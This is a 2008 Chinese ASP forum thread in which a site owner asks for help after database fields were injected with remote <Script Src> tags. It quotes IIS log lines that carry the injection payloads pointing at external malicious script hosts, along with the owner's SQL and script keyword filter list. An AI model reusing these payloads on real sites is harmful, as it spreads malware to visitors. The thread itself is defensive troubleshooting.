老问题:数据库数据被恶意修改,过滤代码实效?大家帮帮忙!

sw0924 2008-12-08 09:37:23
数据库表中数据被加入<Script Src=http://sb.5252.ws:88/107/1.js></Script>这样的东西,以前加入过滤语句,好了一段时间,但最近几天还是被黑了,iis日志如下:

2008-12-06 11:02:02 61.186.133.200 GET /expert/expert0104.asp id=20225&titles=%D0%A1%BA%A2%B8%B9%CD%B4<Script%20Src=http://c.nu%63%6Cear3.com/css/c.js></Script>&keshi=%B6%F9%BF%C6 80 - 202.160.178.164 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 200 0 0

2008-12-06 11:40:36 61.186.133.200 GET /edu/edu0202.asp numbername=04065&filename=%C4%DA%B2%E0%B0%EB%D4%C2%B0%E5%C7%D0%B3%FD%CA%F5&keyword=%B0%EB%D4%C2%B0%E5%CB%F0%C9%CB%A3%BB%B0%EB%D4%C2%B0%E5%C4%D2%D6%D7%3CScript+Src%3Dhttp%3A%2F%2Fc%2Enu%2563%256Cear3%2Ecom%2Fcss%2Fc%2Ejs%3E%3C%2FScript%3E 80 - 121.20.244.146 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0

怀疑是从提交表单注入的脚本语句,我已加入的过滤字符有 ' and exec insert select delete update count * % chr mid master truncate char declare 1=1 1=2 < Script > from -- %20 == & ; = - iframe CHR(39) _ $ # [ ] / \ nuclear3 . js <pre> </pre> </Script>
请问各位大大帮我分析一下日志,还应该再加入哪些字符, 和怎么过滤掉用户提交表单中的脚本语句<script>...</script> ,万分感谢!!!
...全文
51 点赞 收藏 6
写回复
6 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
ZKM_ZHANG 2008-12-08
sql注入可能性不大。
回复
同上
下载一个 超级补漏洞的代码吧
回复
-晴天 2008-12-08
你的查询变量中不是有id了么,还用得着加title干嘛.用id到数据库直接找不就行了.
回复
-晴天 2008-12-08
用querystring中用字符型变量带一长串字符来实现功能,实在不是一种好办法.我写程序时,尽一切可能不用这种形式,特别是要向数据写东西的时候,一定要用post方法.而且对传入内容进行检查.
回复
杨哥儿 2008-12-08
是其它漏洞的原因.
回复
sw0924 2008-12-08
请各位大人帮忙看看,有没有解决方法?
回复
相关推荐
发帖
ASP
创建于2007-09-28

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
申请成为版主
帖子事件
创建了帖子
2008-12-08 09:37
社区公告
暂无公告